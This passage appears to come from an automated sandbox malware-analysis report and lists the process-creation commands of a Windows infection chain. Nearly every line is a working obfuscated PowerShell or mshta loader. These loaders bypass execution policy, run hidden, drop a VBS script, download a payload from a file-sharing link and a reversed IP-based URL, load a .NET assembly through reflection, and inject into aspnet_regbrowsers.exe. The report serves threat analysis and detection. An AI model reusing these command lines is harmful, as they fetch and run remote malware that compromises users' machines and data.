S80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AEA.tmp" "c:\Users\user\AppData\Local\Temp\lwndurzh\CSCC4D24F44B33B435588447526C34E647.TMP"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.cmdline"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS"
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9251.tmp" "c:\Users\user\AppData\Local\Temp\3w1sxmqs\CSC4FC5C9177C1B495AB64B9617174E2B9E.TMP"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jexbtmygicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicbhrgqtvflwzsagicagicagicagicagicagicagicagicagicagicattwvtymvyzevmau5pvelvtiagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjsbu9oiiwgicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicbidedsvwpzlhn0cmluzyagicagicagicagicagicagicagicagicagicagicbjrfngwucsc3ryaw5nicagicagicagicagicagicagicagicagicagicagigveywnzevrzwunrlhvpbnqgicagicagicagicagicagicagicagicagicagicagqmtab0ussw50uhryicagicagicagicagicagicagicagicagicagicagiefquxriyxvicwjuktsnicagicagicagicagicagicagicagicagicagicagic1oyu1licagicagicagicagicagicagicagicagicagicagicjvylricgllzsigicagicagicagicagicagicagicagicagicagicaglw5bbwvtcefjzsagicagicagicagicagicagicagicagicagicagicbewlzyqvjnzfdhacagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicrmqu5mojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumtc2lje0ms80ms9zaw1wbgv0agluz3n3axroz3jlyxr0aglnbnnnaxzlbm1lymvzdhroaw5ncy50suyilcikru52okfquerbvefcc2ltcgxldghpbmdzd2l0agdyzwf0dghpz25zz2l2zw5tzwjlc3qudmjtiiwwldapo1n0yvj0lvnmzuvqkdmpo3n0yxj0icagicagicagicagicagicagicagicagicagicagicikzw52okfquerbvefcc2ltcgxldghpbmdzd2l0agdyzwf0dghpz25zz2l2zw5tzwjlc3qudmjtig=='+[char]34+'))')))"
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jexbtmygicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicbhrgqtvflwzsagicagicagicagicagicagicagicagicagicagicattwvtymvyzevmau5pvelvtiagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjsbu9oiiwgicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicbidedsvwpzlhn0cmluzyagicagicagicagicagicagicagicagicagicagicbjrfngwucsc3ryaw5nicagicagicagicagicagicagicagicagicagicagigveywnzevrzwunrlhvpbnqgicagicagicagicagicagicagicagicagicagicagqmtab0ussw50uhryicagicagicagicagicagicagicagicagicagicagiefquxriyxvicwjuktsnicagicagicagicagicagicagicagicagicagicagic1oyu1licagicagicagicagicagicagicagicagicagicagicjvylricgllzsigicagicagicagicagicagicagicagicagicagicaglw5bbwvtcefjzsagicagicagicagicagicagicagicagicagicagicbewlzyqvjnzfdhacagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicrmqu5mojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumtc2lje0ms80ms9zaw1wbgv0agluz3n3axroz3jlyxr0aglnbnnnaxzlbm1lymvzdhroaw5ncy50suyilcikru52okfquerbvefcc2ltcgxldghpbmdzd2l0agdyzwf0dghpz25zz2l2zw5tzwjlc3qudmjtiiwwldapo1n0yvj0lvnmzuvqkdmpo3n0yxj0icagicagicagicagicagicagicagicagicagicagicikzw52okfquerbvefcc2ltcgxldghpbmdzd2l0agdyzwf0dghpz25zz2l2zw5tzwjlc3qudmjtig=='+[char]34+'))')))"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiggjhbtag9tzvsymv0rjfbzae9tzvszmf0rj3gnksaoicgoj3n3umltywdlvxjsid0gnww3jysnahr0chm6ly8nkydkcml2zs5nb29nbguuy29tl3vjp2v4cg9ydd1kb3dubg9hzczpzd0xqulwz0pksnyxrjz2uzrzvu95ym5ilxnedlvoqll3dxignww3o3n3undlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xjysnzwjdbgllbnq7c3dsaw1hz2vcexrlcya9ihn3undlyknsawvudc5eb3dubg9hzerhdgeoc3dsaw1hz2vvcmwpo3n3jysnumltywdlvgv4dca9ifttexn0zw0nkycuvgv4dc5fbmnvzgluz10nkyc6olvurjgur2v0u3ryaw5nkhn3umltywdlqnl0zxmpo3n3unn0yxj0rmxhzya9idvsnzw8qkenkydtrty0x1nuqvjupicrjz41bdc7c3dszw5krmxhzya9idvsnzw8qkftrty0x0vord4+nww3o3n3unmnkyd0yxj0sw5kzxggpsbzd1jpbwfnzvrlehqusw5kzxhpzicrjyhzd1jzdgfydezsywcpo3n3umvuzeluzgv4id0gc3dsaw1hz2vujysnzxh0lkluzgv4t2yoc3dszw5krmxhzyk7c3dsc3rhcnrjjysnbmrlecatz2ugmcatyw5kihmnkyd3umvuzeluzgv4ic1ndcbzd1jzdgenkydydeluzgv4o3n3unn0yxj0sw5kzxggkz0gc3dsc3rhcnrgbgfnlkxlbmd0adtzd1jiyxnlnjrmzw5ndgggpsbzd1jlbmrjbmrlecatihn3unn0yxj0sw5kzxg7c3dsymfzzty0q29tbwfuzca9ihn3umltywdlvgv4dc5tdwjzjysndhjpbmcoc3dsc3rhcnrjbmrlecwgc3dsymfzzty0tgvuz3rokttzd1jiyxnlnjrszxzlcnnlzca9ic1qbycrj2luichzd1jiyxnlnjrdb21tyw5kllrvq2hhckfycmf5kccrjykgrncxjysniccrj0zvckvhy2gtt2jqzwn0ihsgc3dsxyb9kvstms4ulshzd1jiyxnlnjrdb21tyw5klkxlbmd0acldo3n3umnvbw1hbmrcexrlcya9jysnifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoc3dsymfzzty0umv2zxjzzwqpo3n3umxvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzchzd1jjb21tyw5kqnl0zxmpo3n3unzhau1ldghvzca9iftkjysnbmxpyicrjy5jty5ib21lxs5hzxrnzxrob2qonww3vkfjnww3kttzd1j2ywlnzxrob2qusw52b2tlkhn3um51bgwsieaonww3dhh0llruukxqtvmvmtqvmtqxljy3ms4zlji5ms8vonb0dgg1bdcsidvsn2rlc2f0axzhzg81bdcsidvsn2rlc2f0axzhzg81bdcsidvsn2rlc2f0axzhzg8nkyc1bdcsiccrjzvsn2fzcg5ldf9yzwdicm93c2vyczvsnywgnww3zccrj2vzyxrpdmfkbzvsnywgnww3zgvzyxrpdmfkbzvsnyw1bddkzxnhdgl2ywrvnww3ldvsn2rlc2f0axzhzg81bdcsnww3zgvzyxrpdmfkbzvsnyw1bddkzxnhdgl2ywrvnww3ldvsn2rlc2f0axzhzg81bdcsnww3mtvsnyw1bddkzxnhdgl2ywrvnww3ksk7jykglxjluexhy0unnww3jyxby0hhcl0zosatcmvqtgfjrsanc3dsjyxby0hhcl0zniaglunszxbmqwnlicanrncxjyxby0hhcl0xmjqpick=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "&( $pshome[21]+$pshome[30]+'x') ( (('swrimageurl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1aivgjjjv1f6vs4suoybnh-sdvuhbywur 5l7;swrwebclient = new-object system.net.w'+'ebclient;swrimagebytes = swrwebclient.downloaddata(swrimageurl);sw'+'rimagetext = [system'+'.text.encoding]'+'::utf8.getstring(swrimagebytes);swrstartflag = 5l7<<ba'+'se64_start>'+'>5l7;swrendflag = 5l7<<base64_end>>5l7;swrs'+'tartindex = swrimagetext.indexof'+'(swrstartflag);swrendindex = swrimaget'+'ext.indexof(swrendflag);swrstarti'+'ndex -ge 0 -and s'+'wrendindex -gt swrsta'+'rtindex;swrstartindex += swrstartflag.length;swrbase64length = swrendindex - swrstartindex;swrbase64command = swrimagetext.subs'+'tring(swrstartindex, swrbase64length);swrbase64reversed = -jo'+'in (swrbase64command.tochararray('+') fw1'+' '+'foreach-object { swr_ })[-1..-(swrbase64command.length)];swrcommandbytes ='+' [system.convert]::frombase64string(swrbase64reversed);swrloadedassembly = [system.reflection.assembly]::load(swrcommandbytes);swrvaimethod = [d'+'nlib'+'.io.home].getmethod(5l7vai5l7);swrvaimethod.invoke(swrnull, @(5l7txt.ttrlpms/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -replace'5l7',[char]39 -replace 'swr',[char]36 -creplace 'fw1',[char]124) )"
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jexbtmygicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicbhrgqtvflwzsagicagicagicagicagicagicagicagicagicagicattwvtymvyzevmau5pvelvtiagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjsbu9oiiwgicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicbidedsvwpzlhn0cmluzyagicagicagicagicagicagicagicagicagicagicbjrfngwucsc3ryaw5nicagicagicagicagicagicagicagicagicagicagigveywnzevrzwunrlhvpbnqgicagicagicagicagicagicagicagicagicagicagqmtab0ussw50uhryicagicagicagicagicagicagicagicagicagicagiefquxriyxvicwjuktsnicagicagicagicagicagicagicagicagicagicagic1oyu1licagicagicagicagicagicagicagicagicagicagicjvylricgllzsigicagicagicagicagicagicagicagicagicagicaglw5bbwvtcefjzsagicagicagicagicagicagicagicagicagicagicbewlzyqvjnzfdhacagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicrmqu5mojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumtc2lje0ms80ms9zaw1wbgv0agluz3n3axroz3jlyxr0aglnbnnnaxzlbm1lymvzdhroaw5ncy50suyilcikru52okfquerbvefcc2ltcgxldghpbmdzd2l0agdyzwf0dghpz25zz2l2zw5tzwjlc3qudmjtiiwwldapo1n0yvj0lvnmzuvqkdmpo3n0yxj0icagicagicagicagicagicagicagicagicagicagicikzw52okfquerbvefcc2ltcgxldghpbmdzd2l0agdyzwf0dghpz25zz2l2zw5tzwjlc3qudmjtig=='+[char]34+'))')))"Jump to behavior
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jexbtmygicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicbhrgqtvflwzsagicagicagicagicagicagicagicagicagicagicattwvtymvyzevmau5pvelvtiagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjsbu9oiiwgicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicbidedsvwpzlhn0cmluzyagicagicagicagicagicagicagicagicagicagicbjrfngwucsc3ryaw5nicagicagicagicagicagicagicagicagicagicagigveywnzevrzwunrlhvpbnqgicagicagicagicagicagicagicagicagicagicagqmtab0ussw50uhryicagicagicagicagicagicagicagicagicagicagiefquxriyxvicwjuktsnicagicagicagicagicagicagicagicagicagicagic1oyu1licagicagicagicagicagicagicagicagicagicagicjvylricgllzsigicagicagicagicagicagicagicagicagicagicaglw5bbwvtcefjzsagicagicagicagicagicagicagicagicagicagicbewlzyqvjnzfdhacagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicrmqu5mojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumtc2lje0ms80ms9zaw1wbgv0agluz3n3axroz3jlyxr0aglnbnnnaxzlbm1lymvzdhroaw5ncy50suyilcikru52okfquerbvefcc2ltcgxldghpbmdzd2l0agdyzwf0dghpz25zz2l2zw5tzwjlc3qudmjtiiwwldapo1n0yvj0lvnmzuvqkdmpo3n0yxj0icagicagicagicagicagicagicagicagicagicagicikzw52okfquerbvefcc2ltcgxldghpbmdzd2l0agdyzwf0dghpz25zz2l2zw5tzwjlc3qudmjtig=='+[char]34+'))')))"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiggjhbtag9tzvsymv0rjfbzae9tzvszmf0rj3gnksaoicgoj3n3umltywdlvxjsid0gnww3jysnahr0chm6ly8nkydkcml2zs5nb29nbguuy29tl3vjp2v4cg9ydd1kb3dubg9hzczpzd0xqulwz0pksnyxrjz2uzrzvu95ym5ilxnedlvoqll3dxignww3o3n3undlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xjysnzwjdbgllbnq7c3dsaw1hz2vcexrlcya9ihn3undlyknsawvudc5eb3dubg9hzerhdgeoc3dsaw1hz2vvcmwpo3n3jysnumltywdlvgv4dca9ifttexn0zw0nkycuvgv4dc5fbmnvzgluz10nkyc6olvurjgur2v0u3ryaw5nkhn3umltywdlqnl0zxmpo3n3unn0yxj0rmxhzya9idvsnzw8qkenkydtrty0x1nuqvjupicrjz41bdc7c3dszw5krmxhzya9idvsnzw8qkftrty0x0vord4+nww3o3n3unmnkyd0yxj0sw5kzxggpsbzd1jpbwfnzvrlehqusw5kzxhpzicrjyhzd1jzdgfydezsywcpo3n3umvuzeluzgv4id0gc3dsaw1hz2vujysnzxh0lkluzgv4t2yoc3dszw5krmxhzyk7c3dsc3rhcnrjjysnbmrlecatz2ugmcatyw5kihmnkyd3umvuzeluzgv4ic1ndcbzd1jzdgenkydydeluzgv4o3n3unn0yxj0sw5kzxggkz0gc3dsc3rhcnrgbgfnlkxlbmd0adtzd1jiyxnlnjrmzw5ndgggpsbzd1jlbmrjbmrlecatihn3unn0yxj0sw5kzxg7c3dsymfzzty0q29tbwfuzca9ihn3umltywdlvgv4dc5tdwjzjysndhjpbmcoc3dsc3rhcnrjbmrlecwgc3dsymfzzty0tgvuz3rokttzd1jiyxnlnjrszxzlcnnlzca9ic1qbycrj2luichzd1jiyxnlnjrdb21tyw5kllrvq2hhckfycmf5kccrjykgrncxjysniccrj0zvckvhy2gtt2jqzwn0ihsgc3dsxyb9kvstms4ulshzd1jiyxnlnjrdb21tyw5klkxlbmd0acldo3n3umnvbw1hbmrcexrlcya9jysnifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoc3dsymfzzty0umv2zxjzzwqpo3n3umxvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzchzd1jjb21tyw5kqnl0zxmpo3n3unzhau1ldghvzca9iftkjysnbmxpyicrjy5jty5ib21lxs5hzxrnzxrob2qonww3vkfjnww3kttzd1j2ywlnzxrob2qusw52b2tlkhn3um51bgwsieaonww3dhh0llruukxqtvmvmtqvmtqxljy3ms4zlji5ms8vonb0dgg1bdcsidvsn2rlc2f0axzhzg81bdcsidvsn2rlc2f0axzhzg81bdcsidvsn2rlc2f0axzhzg8nkyc1bdcsiccrjzvsn2fzcg5ldf9yzwdicm93c2vyczvsnywgnww3zccrj2vzyxrpdmfkbzvsnywgnww3zgvzyxrpdmfkbzvsnyw1bddkzxnhdgl2ywrvnww3ldvsn2rlc2f0axzhzg81bdcsnww3zgvzyxrpdmfkbzvsnyw1bddkzxnhdgl2ywrvnww3ldvsn2rlc2f0axzhzg81bdcsnww3mtvsnyw1bddkzxnhdgl2ywrvnww3ksk7jykglxjluexhy0unnww3jyxby0hhcl0zosatcmvqtgfjrsanc3dsjyxby0hhcl0zniaglunszxbmqwnlicanrncxjyxby0hhcl0xmjqpick=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "&( $pshome[21]+$pshome[30]+'x') ( (('swrimageurl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1aivgjjjv1f6vs4suoybnh-sdvuhbywur 5l7;swrwebclient = new-object system.net.w'+'ebclient;swrimagebytes = swrwebclient.downloaddata(swrimageurl);sw'+'rimagetext = [system'+'.text.encoding]'+'::utf8.getstring(swrimagebytes);swrstartflag = 5l7<<ba'+'se64_start>'+'>5l7;swrendflag = 5l7<<base64_end>>5l7;swrs'+'tartindex = swrimagetext.indexof'+'(swrstartflag);swrendindex = swrimaget'+'ext.indexof(swrendflag);swrstarti'+'ndex -ge 0 -and s'+'wrendindex -gt swrsta'+'rtindex;swrstartindex += swrstartflag.length;swrbase64length = swrendindex - swrstartindex;swrbase64command = swrimagetext.subs'+'tring(swrstartindex, swrbase64length);swrbase64reversed = -jo'+'in (swrbase64command.tochararray('+') fw1'+' '+'foreach-object { swr_ })[-1..-(swrbase64command.length)];swrcommandbytes ='+' [system.convert]::frombase64string(swrbase64reversed);swrloadedassembly = [system.reflection.assembly]::load(swrcommandbytes);swrvaimethod = [d'+'nlib'+'.io.home].getmethod(5l7vai5l7);swrvaimethod.invoke(swrnull, @(5l7txt.ttrlpms/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -replace'5l7',[char]39 -replace 'swr',[char]36 -creplace 'fw1',[char]124) )"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
